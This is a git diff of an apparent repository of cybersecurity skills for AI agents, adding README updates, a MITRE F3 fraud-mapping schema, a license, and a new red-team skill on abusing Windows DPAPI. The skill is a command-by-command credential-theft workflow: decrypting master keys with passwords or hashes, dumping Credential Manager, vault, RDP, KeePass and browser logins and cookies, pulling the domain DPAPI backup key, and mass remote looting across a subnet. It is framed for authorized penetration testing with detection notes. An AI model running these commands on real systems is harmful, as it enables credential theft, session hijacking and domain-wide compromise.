Every skill carries a `mitre_attack` frontmatter list validated against **MITRE ATT&CK v19.1** (the latest release) using the official `mitreattack-python` library — 286 distinct techniques across all 15 Enterprise tactics, plus ICS and Mobile techniques where relevant. Zero revoked or deprecated IDs. v19.1's restructured Defense Evasion (now split into **Stealth** and **Defense Impairment**) is reflected below.
| Tactic | ID | Skills |
|--------|----|--------|
| Reconnaissance | TA0043 | 103 |
| Resource Development | TA0042 | 22 |
| Initial Access | TA0001 | 467 |
| Execution | TA0002 | 350 |
| Persistence | TA0003 | 444 |
| Privilege Escalation | TA0004 | 464 |
| Stealth | TA0005 | 442 |
| Defense Impairment | TA0112 | 92 |
| Credential Access | TA0006 | 202 |
| Discovery | TA0007 | 237 |
| Lateral Movement | TA0008 | 68 |
| Collection | TA0009 | 172 |
| Command and Control | TA0011 | 123 |
| Exfiltration | TA0010 | 82 |
| Impact | TA0040 | 50 |
## Quick start
@@ -68,6 +106,22 @@ cd Anthropic-Cybersecurity-Skills
```
Works immediately with Claude Code, GitHub Copilot, OpenAI Codex CLI, Cursor, Gemini CLI, and any [agentskills.io](https://agentskills.io)-compatible platform.
## 🌍 GARS-2026 — Global Agentic AI Readiness Survey
I'm running a global academic study measuring how ready security professionals,
developers, and enterprise teams actually are for agentic AI — MCP servers,
tool calling, governance, and human-in-the-loop workflows.
**If you use this repo, your response would be a genuinely valuable data point.**
📋 **Take the survey (10 min):**
[Survey Link](https://mahipal.engineer/survey?utm_source=github_repo&utm_medium=readme&utm_campaign=gars2026)
- 60 questions · Anonymous · Supervised by SRH Berlin
- You get **50 Casky Tokens** for early access to [casky.ai](https://casky.ai)
- Results published open access under CC-BY 4.0
## 🚀 Try it on the Playground
Experience Casky.ai hands-on — no setup required.
@@ -89,47 +143,50 @@ Existing security tool repos give you wordlists, payloads, or exploit code. None
**Anthropic Cybersecurity Skills** is not a collection of scripts or checklists. It is an **AI-native knowledge base** built from the ground up for the agentskills.io standard — YAML frontmatter for sub-second discovery, structured Markdown for step-by-step execution, and reference files for deep technical context. Every skill encodes real practitioner workflows, not generated summaries.
## What's inside — 26 security domains
## What's inside — 29 security domains
| Domain | Skills | Key capabilities |
|---|---|---|
| Cloud Security | 60 | AWS, Azure, GCP hardening · CSPM · cloud forensics |
| Threat Hunting | 55 | Hypothesis-driven hunts · LOTL detection · behavioral analytics |
| Threat Intelligence | 50 | STIX/TAXII · MISP · feed integration · actor profiling |
| Cloud Security | 66 | AWS, Azure, GCP hardening · CSPM · cloud attack emulation · cloud forensics |
| Threat Hunting | 58 | Hypothesis-driven hunts · LOTL detection · EVTX hunting · fleet hunting |
| Threat Intelligence | 52 | STIX/TAXII · MISP · OpenCTI · feed integration · actor profiling |
| Network Security | 43 | IDS/IPS · firewall rules · VLAN segmentation · traffic analysis |
| Web Application Security | 42 | OWASP Top 10 · SQLi · XSS · SSRF · deserialization |
| Network Security | 40 | IDS/IPS · firewall rules · VLAN segmentation · traffic analysis |
| Digital Forensics | 41 | Disk imaging · memory forensics · Hayabusa/KAPE/Plaso timelines |
| Malware Analysis | 39 | Static/dynamic analysis · reverse engineering · sandboxing |
| Digital Forensics | 37 | Disk imaging · memory forensics · timeline reconstruction |
| Security Operations | 36 | SIEM correlation · log analysis · alert triage |
| Identity & Access Management | 35 | IAM policies · PAM · zero trust identity · Okta · SailPoint |
| SOC Operations | 33 | Playbooks · escalation workflows · metrics · tabletop exercises |
| Container Security | 30 | K8s RBAC · image scanning · Falco · container forensics |
| Identity & Access Management | 37 | Entra ID/ROADtools · device-code phishing · PAM · zero trust identity |
| SOC Operations | 35 | Playbooks · escalation workflows · Graph-log detection · tabletop exercises |
| Red Teaming | 33 | ADCS/Certipy · BloodHound CE · Sliver/Havoc C2 · NTLM relay |
| Container Security | 33 | K8s RBAC · image scanning · Falco · container escape |
| Security Operations | 28 | SIEM correlation · log analysis · alert triage |
| OT/ICS Security | 28 | Modbus · DNP3 · IEC 62443 · historian defense · SCADA |
| API Security | 28 | GraphQL · REST · OWASP API Top 10 · WAF bypass |
| Incident Response | 26 | Breach containment · ransomware response · IR playbooks |
| Vulnerability Management | 25 | Nessus · scanning workflows · patch prioritization · CVSS |
| Incident Response | 25 | Breach containment · ransomware response · IR playbooks |
| Red Teaming | 24 | Full-scope engagements · AD attacks · phishing simulation |
| Penetration Testing | 23 | Network · web · cloud · mobile · wireless pentesting |
| Penetration Testing | 21 | Network · web · cloud · mobile · NetExec lateral movement |
| DevSecOps | 18 | CI/CD security · Trivy IaC/image scanning · code signing |
| Zero Trust Architecture | 17 | BeyondCorp · CISA maturity model · microsegmentation |
| Endpoint Security | 17 | EDR · LOTL detection · fileless malware · persistence hunting |
| DevSecOps | 17 | CI/CD security · code signing · Terraform auditing |
| Phishing Defense | 16 | Email authentication · BEC detection · phishing IR |
| Cryptography | 14 | TLS · Ed25519 · certificate transparency · key management |
| Zero Trust Architecture | 13 | BeyondCorp · CISA maturity model · microsegmentation |
| Mobile Security | 12 | Android/iOS analysis · mobile pentesting · MDM forensics |
| Ransomware Defense | 7 | Precursor detection · response · recovery · encryption analysis |
| Compliance & Governance | 5 | CIS benchmarks · SOC 2 · regulatory frameworks |
| Deception Technology | 2 | Honeytokens · breach detection canaries |
| Cryptography | 16 | TLS · Ed25519 · post-quantum migration · key management |
| Phishing Defense | 15 | Email authentication · BEC detection · phishing IR |
| AI Security | 14 | LLM red-teaming (garak/PyRIT) · prompt injection · MCP/agentic security · guardrails |
| Mobile Security | 13 | Android/iOS analysis · mobile pentesting · MDM forensics |
| Ransomware Defense | 13 | Precursor detection · response · recovery · encryption analysis |
| Compliance & Governance | 9 | NIST 800-30/RMF · CMMC · HIPAA · TPRM · CIS benchmarks |
| Supply Chain Security | 8 | SBOMs · dependency confusion · malicious-package triage · SLSA/Sigstore |
| Deception Technology | 6 | Honeytokens · canarytokens · breach detection |
| Hardware & Firmware Security | 4 | CHIPSEC/UEFI audit · Secure Boot bypass · TPM attestation · bootkit hunting |
## How AI agents use these skills
Each skill costs **~30 tokens to scan** (frontmatter only) and **5002,000 tokens to fully load** (complete workflow). This progressive disclosure architecture lets agents search all 754 skills in a single pass without blowing context windows.
Each skill costs **~30 tokens to scan** (frontmatter only) and **5002,000 tokens to fully load** (complete workflow). This progressive disclosure architecture lets agents search all 817 skills in a single pass without blowing context windows.
```
User prompt: "Analyze this memory dump for signs of credential theft"
Agent's internal process:
1. Scans 754 skill frontmatters (~30 tokens each)
1. Scans 817 skill frontmatters (~30 tokens each)
→ identifies 12 relevant skills by matching tags, description, domain
2. Loads top 3 matches:
@@ -317,7 +374,7 @@ All platforms that support the [agentskills.io](https://agentskills.io) standard
|---|---|---|
| [v1.0.0](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases/tag/v1.0.0) | March 11, 2026 | 734 skills · 26 domains · MITRE ATT&CK + NIST CSF 2.0 mapping · ATT&CK Navigator layer |
Skills have continued to grow on `main` since v1.0.0 — the library now contains **754 skills** with **5-framework mapping** (MITRE ATLAS, D3FEND, and NIST AI RMF added post-release). Check [Releases](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases) for the latest tagged version.
Skills have continued to grow on `main` since v1.0.0 — the library now contains **817 skills** with **6-framework mapping** (MITRE ATLAS, D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework added post-release). Check [Releases](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases) for the latest tagged version.
## Contributing
@@ -350,7 +407,7 @@ If you use this project in research or publications:
year = {2026},
url = {https://github.com/mukul975/Anthropic-Cybersecurity-Skills},
license = {Apache-2.0},
note = {754 structured cybersecurity skills for AI agents,
note = {817 structured cybersecurity skills for AI agents,
mapped to MITRE ATT\&CK, NIST CSF 2.0, MITRE ATLAS,
MITRE D3FEND, and NIST AI RMF}
}
docs/mitre-f3-mapping.md
+93
View File
@@ -0,0 +1,93 @@
# MITRE Fight Fraud Framework (F3) — Mapping Schema
This repository maps fraud-relevant skills to the **MITRE Fight Fraud Framework (F3)**,
released April 9, 2026 by MITRE's Center for Threat-Informed Defense (CTID). F3 is an
ATT&CK-compatible TTP catalog for cyber-enabled financial fraud.
- Upstream project: <https://ctid.mitre.org/fraud/>
- Source repo: <https://github.com/center-for-threat-informed-defense/fight-fraud-framework>
- License: Apache-2.0
- Mapped version in this repo: **F3 v1.1**
## Why F3 in addition to ATT&CK
ATT&CK collapses post-compromise fraud into the single `T1657` (Financial Theft)
technique. F3 decomposes the "how a cyber intrusion becomes a financial loss" stages
into two dedicated tactics that ATT&CK does not have:
- **Positioning** (`FA0001`) — after access, collect/manipulate data and prepare the fraud.
- **Monetization** (`FA0002`) — convert stolen assets into usable funds.
So `mitre_attack` answers "how did the adversary get in / operate technically" and
`mitre_f3` answers "how did that turn into money." They are kept as **separate
frontmatter blocks** because F3 redefines several ATT&CK tactics for the fraud context.
## The 8 F3 v1.1 tactics
| Tactic slug | F3 ID | Origin |
|---|---|---|
| `reconnaissance` | TA0043 | ATT&CK (redefined) |
| `resource-development` | TA0042 | ATT&CK (redefined) |
| `initial-access` | TA0001 | ATT&CK (redefined) |
| `stealth` | TA0005 | ATT&CK (redefined) |
| `positioning` | **FA0001** | **F3-new** |
| `execution` | TA0002 | ATT&CK (redefined) |
| `monetization` | **FA0002** | **F3-new** |
| `defense-impairment` | TA0112 | ATT&CK (redefined) |
## Technique ID conventions
- **`F1XXX`** — fraud-specific techniques introduced by F3 (e.g. `F1005.003`
Account Manipulation: Add Beneficiary, `F1025.003` Electronic Funds Transfer:
Wire Transfer, `F1018` Convert to Cryptocurrency).
- **`T1XXX`** — ATT&CK techniques reused verbatim inside F3 (e.g. `T1566` Phishing,
`T1586` Compromise Accounts, `T1557` Adversary-in-the-Middle).
- Sub-techniques use ATT&CK dot notation (`F1005.003`, `T1566.002`).
Every ID used in this repo is a real, active technique present in the F3 v1.1 STIX
bundle — there are no `TBD`/placeholder IDs.
## Frontmatter schema
The `mitre_f3` block sits alongside the existing `mitre_attack` block:
```yaml
mitre_f3:
version: '1.1'
tactics:
- positioning
- monetization
techniques:
- id: F1005.003
name: 'Account Manipulation: Add Beneficiary'
tactic: positioning
source: f3 # F-prefixed = fraud-specific
- id: T1586
name: Compromise Accounts
tactic: resource-development
source: attack # T-prefixed = reused ATT&CK
```
Rules:
1. `id` must be a real F3 v1.1 technique ID.
2. `name` must match the technique's official name in the F3 catalog.
3. `tactic` must be one the technique actually lists in the catalog.
4. `source` is `f3` for `F1XXX` IDs and `attack` for `T1XXX` IDs.
## Scope
F3 mappings are applied only to **fraud-relevant skills** — phishing/social
engineering, account takeover, banking malware/stealers, BEC, identity/KYC,
payment/card fraud, money-mule/cash-out, ransomware extortion, and the cross-cutting
DFIR and threat-intelligence skills. Skills with no fraud dimension do not carry an
`mitre_f3` block.
## Regenerating / verifying the catalog
```bash
git clone --depth 1 https://github.com/center-for-threat-informed-defense/fight-fraud-framework
# technique catalog is the STIX bundle:
# fight-fraud-framework/public/f3-stix-v1.1.json
```
All `mitre_f3` IDs in this repo are validated against that bundle on every update.
index.json
+1 -1
View File
File diff suppressed because one or more lines are too long
skills/abusing-dpapi-for-credential-access/LICENSE
+201
View File
@@ -0,0 +1,201 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to the Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by the Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding any notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. Please do not remove or change
the license header comment from a contributed file except when
necessary.
Copyright 2026 mukul975
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
skills/abusing-dpapi-for-credential-access/SKILL.md
+209
View File
@@ -0,0 +1,209 @@
---
name: abusing-dpapi-for-credential-access
description: Extract DPAPI-protected secrets such as credentials and browser data offline and online.
domain: cybersecurity
subdomain: red-teaming
tags:
- red-team
- credential-access
- dpapi
- sharpdpapi
- post-exploitation
- active-directory
- windows
- mimikatz
version: '1.0'
author: mahipal
license: Apache-2.0
nist_csf:
- DE.CM-01
mitre_attack:
- T1555.004
---
# Abusing DPAPI for Credential Access
> **Legal Notice:** This skill is for authorized penetration testing, red-team engagements, and educational purposes only. Extracting credentials from systems you do not own or lack explicit written authorization to test is illegal and may violate computer fraud and abuse laws. Always operate within a signed rules-of-engagement and document every action.
## Overview
The Windows Data Protection API (DPAPI) is the operating system's built-in symmetric-encryption service that applications use to protect secrets at rest: saved RDP and Windows Credential Manager credentials, web and Wi-Fi credentials in the Credential Vault, browser saved logins and cookies (Chrome/Edge), KeePass keys, certificate private keys, and Scheduled Task passwords. DPAPI derives a per-user (or per-machine) **master key** from the user's password (or the machine account secret), and that master key encrypts individual "DPAPI blobs." The encrypted master keys live under `%APPDATA%\Microsoft\Protect\<SID>\` (user) and `%WINDIR%\System32\Microsoft\Protect\` (machine).
Red teamers abuse DPAPI to recover plaintext secrets after gaining a foothold, mapping to MITRE ATT&CK **T1555.004 (Credentials from Password Stores: Windows Credential Manager)**. There are three primary decryption paths:
1. **Online / context-based** — running as the target user, DPAPI APIs (`CryptUnprotectData`) transparently decrypt the user's blobs. SharpDPAPI's `/unprotect` flag uses this.
2. **Offline with the user password or NTLM hash** — decrypt the user's master keys with `/password:` or `/ntlm:`, then decrypt the blobs offline (great for triaged files pulled from a host).
3. **Domain-wide with the DPAPI backup key** — Domain Admins can extract the domain's RSA DPAPI backup key (`.pvk`) once, then decrypt *any* domain user's master keys forever, online or offline, with `/pvk:`.
The canonical tooling is **SharpDPAPI** (GhostPack, a C# port of Mimikatz DPAPI functionality) for Windows, **SharpChrome** for browser secrets, and **Mimikatz** (`dpapi::*`) as the original implementation. On Linux, Impacket's `dpapi.py` and `donpapi` perform remote/offline triage.
## When to Use
- After compromising a Windows host where the user has saved RDP, browser, or vault credentials worth harvesting for lateral movement.
- When you hold a user's password or NTLM hash and want to decrypt their DPAPI-protected secrets offline.
- When you have Domain Admin and want to obtain the domain DPAPI backup key to decrypt any user's protected data across the estate.
- When triaging exfiltrated `Credentials`, `Vault`, or `Protect` directories from disk images.
- During purple-team exercises to validate detection of DPAPI master-key access and LSASS/Protect-folder reads.
## Prerequisites
- An authorized foothold (interactive session, beacon, or remote admin) on the target Windows host.
- Knowledge of the target user's SID, and one of: the user's session, password, NTLM hash, or Domain Admin rights for the backup key.
- Tooling (compile from source or use release binaries; obtain only from official upstreams):
```bash
# SharpDPAPI / SharpChrome (GhostPack) — build with Visual Studio / msbuild
git clone https://github.com/GhostPack/SharpDPAPI.git
# Open SharpDPAPI.sln and build Release, or:
msbuild SharpDPAPI.sln /p:Configuration=Release
# Mimikatz (original DPAPI implementation)
# https://github.com/gentilkiwi/mimikatz/releases
# Linux remote/offline triage (Impacket)
pipx install impacket # provides dpapi.py / impacket-dpapi
pipx install donpapi # https://github.com/login-securite/DonPAPI
```
## Objectives
- Triage a host for DPAPI-protected credential, vault, RDP, and certificate blobs.
- Decrypt user master keys online (`/unprotect`), with a password/hash, or with the domain backup key.
- Recover plaintext Credential Manager and Vault secrets.
- Extract browser saved logins and cookies with SharpChrome.
- Obtain and reuse the domain DPAPI backup key for estate-wide decryption.
## MITRE ATT&CK Mapping
| Technique ID | Name | Tactic | Relevance |
|--------------|------|--------|-----------|
| T1555.004 | Credentials from Password Stores: Windows Credential Manager | Credential Access | DPAPI protects Credential Manager / Vault entries; decrypting master keys and blobs recovers these stored credentials. |
| T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Credential Access | SharpChrome decrypts DPAPI-protected Chrome/Edge logins, cookies, and state keys. |
| T1003 | OS Credential Dumping | Credential Access | Extracting master keys / backup keys is a form of credential material dumping. |
## Workflow
### 1. Triage the host for DPAPI blobs
Run the SharpDPAPI `triage` command in the user's context to automatically enumerate and (where possible) decrypt credentials, vaults, RDG/RDP, and certificates:
```powershell
# Online triage in the current user's context (uses CryptUnprotectData)
SharpDPAPI.exe triage /unprotect
# Machine triage (requires local admin / SYSTEM) for machine-scoped blobs
SharpDPAPI.exe machinetriage
```
### 2. Decrypt user master keys offline (password or NTLM hash)
If you hold the user's password or hash, decrypt their master keys to a `{GUID}:SHA1` mapping you can reuse against individual blobs:
```powershell
# Decrypt all of the current/specified user's master keys with the password
SharpDPAPI.exe masterkeys /password:CorrectHorseBatteryStaple
# Decrypt master keys with the user's NTLM hash instead of the password
SharpDPAPI.exe masterkeys /ntlm:cc36cf7a8514893efccd332446158b1a
# Output is GUID:SHA1 lines — feed them to credentials/vaults commands
```
### 3. Recover Credential Manager and Vault secrets
Use the decrypted master-key mapping (or `/pvk:`) to decrypt the stored credentials and vault entries:
```powershell
# Decrypt Credential Manager blobs with a GUID:SHA1 mapping
SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1
# Or point at a target Credentials folder and decrypt with the domain backup key
SharpDPAPI.exe credentials /target:C:\Users\bob\AppData\Local\Microsoft\Credentials\ /pvk:backupkey.pvk
# Decrypt Credential Vault entries
SharpDPAPI.exe vaults /pvk:backupkey.pvk
```
### 4. Decrypt RDP, KeePass, and certificate secrets
```powershell
# Saved RDCMan.settings RDP passwords (current user context)
SharpDPAPI.exe rdg /unprotect
# KeePass DPAPI-protected master keys
SharpDPAPI.exe keepass /unprotect
# Certificate private keys (export usable .pem with /showall for all stores)
SharpDPAPI.exe certificates /unprotect /showall
```
### 5. Extract browser credentials with SharpChrome
SharpChrome decrypts Chrome/Edge logins and cookies. Modern Chromium uses an App-Bound "state key" that SharpChrome resolves via DPAPI:
```powershell
# Decrypt saved logins for the current user
SharpChrome.exe logins /unprotect
# Decrypt cookies (useful for session hijacking) in a target folder
SharpChrome.exe cookies /target:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /pvk:backupkey.pvk
# Resolve the AES state key explicitly
SharpChrome.exe statekeys /unprotect
```
### 6. Obtain the domain DPAPI backup key (Domain Admin)
With Domain Admin, retrieve the domain's RSA DPAPI backup private key once. This key decrypts every domain user's master keys indefinitely:
```powershell
# Pull and save the domain backup key as a .pvk via the MS-BKRP RPC interface
SharpDPAPI.exe backupkey /server:dc01.corp.local /file:backupkey.pvk
```
Then decrypt any user's master keys offline with it:
```powershell
SharpDPAPI.exe masterkeys /pvk:backupkey.pvk /target:C:\Users\alice\AppData\Roaming\Microsoft\Protect\
```
### 7. Remote / Linux-based triage (Impacket / DonPAPI)
From a Linux operator box, harvest and decrypt DPAPI secrets across hosts:
```bash
# Decrypt a single masterkey file with Impacket using the domain backup key
impacket-dpapi masterkey -file <masterkey_file> -pvk backupkey.pvk
# Decrypt a credential blob with the recovered masterkey
impacket-dpapi credential -file <cred_blob> -key 0x<decrypted_masterkey>
# Mass remote DPAPI looting across hosts with DonPAPI
donpapi collect -u alice -p 'Password123!' -d corp.local --target 10.0.0.0/24
```
## Tools and Resources
| Tool | Purpose | Link |
|------|---------|------|
| SharpDPAPI | Windows DPAPI triage/decryption (C#) | https://github.com/GhostPack/SharpDPAPI |
| SharpChrome | Chromium logins/cookies/state-key decryption | https://github.com/GhostPack/SharpDPAPI |
| Mimikatz | Original DPAPI (`dpapi::*`) implementation | https://github.com/gentilkiwi/mimikatz |
| Impacket dpapi.py | Remote/offline DPAPI decryption (Python) | https://github.com/fortra/impacket |
| DonPAPI | Mass remote DPAPI looting | https://github.com/login-securite/DonPAPI |
| HackTricks DPAPI | Technique reference | https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html |
## Detection and OPSEC Notes
- Master-key access and reads of `\Microsoft\Protect\` and `\Microsoft\Credentials\` are detectable; `backupkey` triggers an MS-BKRP RPC call to the DC.
- The `/unprotect` (online) path is the stealthiest single-host option but only works as the live user.
- Defenders should monitor for Sysmon process access to LSASS and abnormal access to Protect/Credentials folders (DE.CM-01).
## Validation Criteria
- [ ] Host triaged with `SharpDPAPI triage` / `machinetriage`.
- [ ] User master keys decrypted via `/unprotect`, `/password:`, `/ntlm:`, or `/pvk:`.
- [ ] Credential Manager and Vault secrets recovered.
- [ ] RDP / KeePass / certificate secrets extracted where present.
- [ ] Browser logins/cookies decrypted with SharpChrome.
- [ ] Domain DPAPI backup key retrieved with Domain Admin (if in scope) and reused offline.
- [ ] All recovered secrets documented with source host/user and ROE adherence confirmed.
skills/abusing-dpapi-for-credential-access/references/api-reference.md
+73
View File
@@ -0,0 +1,73 @@
# SharpDPAPI / DPAPI — Command Reference
## SharpDPAPI User Commands
| Command | Purpose | Example |
|---------|---------|---------|
| `triage` | Auto-run credentials, vaults, rdg, certificates | `SharpDPAPI.exe triage /unprotect` |
| `masterkeys` | Decrypt user master keys (GUID:SHA1 output) | `SharpDPAPI.exe masterkeys /password:Pass` |
| `credentials` | Decrypt Credential Manager blobs | `SharpDPAPI.exe credentials /pvk:key.pvk` |
| `vaults` | Decrypt Credential Vault entries | `SharpDPAPI.exe vaults /pvk:key.pvk` |
| `rdg` | Decrypt RDCMan.settings RDP passwords | `SharpDPAPI.exe rdg /unprotect` |
| `keepass` | Decrypt KeePass DPAPI keys | `SharpDPAPI.exe keepass /unprotect` |
| `certificates` | Decrypt certificate private keys | `SharpDPAPI.exe certificates /unprotect /showall` |
## SharpDPAPI Machine Commands (require admin/SYSTEM)
| Command | Purpose |
|---------|---------|
| `machinemasterkeys` | Decrypt machine master keys (uses DPAPI_SYSTEM LSA secret) |
| `machinecredentials` | Decrypt machine credential blobs |
| `machinevaults` | Decrypt machine vault entries |
| `machinetriage` | Run all machine-scoped triage commands |
## SharpDPAPI Supporting Commands
| Command | Purpose | Example |
|---------|---------|---------|
| `backupkey` | Retrieve domain DPAPI backup key (.pvk) via MS-BKRP | `SharpDPAPI.exe backupkey /server:dc01 /file:key.pvk` |
## Common Flags
| Flag | Meaning |
|------|---------|
| `/unprotect` | Use live `CryptUnprotectData` in current user context (online) |
| `/password:<pw>` | Decrypt master keys with the user's plaintext password |
| `/ntlm:<hash>` | Decrypt master keys with the user's NTLM hash |
| `/pvk:<file>` | Use domain backup private key for decryption |
| `/mkfile:<file>` | Provide a specific master key file |
| `/server:<dc>` | Target DC for backupkey retrieval |
| `/target:<path>` | Target file/folder to decrypt |
| `/rpc` | Use RPC to request master key decryption from a DC |
| `/showall` | Show all certificate stores / verbose output |
## SharpChrome Commands
| Command | Purpose | Example |
|---------|---------|---------|
| `logins` | Decrypt saved browser logins | `SharpChrome.exe logins /unprotect` |
| `cookies` | Decrypt browser cookies | `SharpChrome.exe cookies /pvk:key.pvk` |
| `statekeys` | Decrypt the AES app-bound state key | `SharpChrome.exe statekeys /unprotect` |
## Impacket dpapi.py (Linux)
| Subcommand | Purpose | Example |
|------------|---------|---------|
| `masterkey` | Decrypt a master key file | `impacket-dpapi masterkey -file MK -pvk key.pvk` |
| `credential` | Decrypt a credential blob | `impacket-dpapi credential -file CRED -key 0x<mk>` |
| `vault` | Decrypt vault policy/creds | `impacket-dpapi vault -vpol VPOL -vcrd VCRD -key 0x<mk>` |
| `backupkeys` | Retrieve domain backup keys | `impacket-dpapi backupkeys -t corp.local/admin@dc -pvk out.pvk` |
## Key File Locations
| Path | Contents |
|------|----------|
| `%APPDATA%\Microsoft\Protect\<SID>\` | User master keys |
| `%WINDIR%\System32\Microsoft\Protect\` | Machine master keys |
| `%LOCALAPPDATA%\Microsoft\Credentials\` | Credential Manager blobs |
| `%APPDATA%\Microsoft\Vault\` / `%LOCALAPPDATA%\Microsoft\Vault\` | Credential Vault |
## External References
- SharpDPAPI README: https://github.com/GhostPack/SharpDPAPI
- Impacket: https://github.com/fortra/impacket
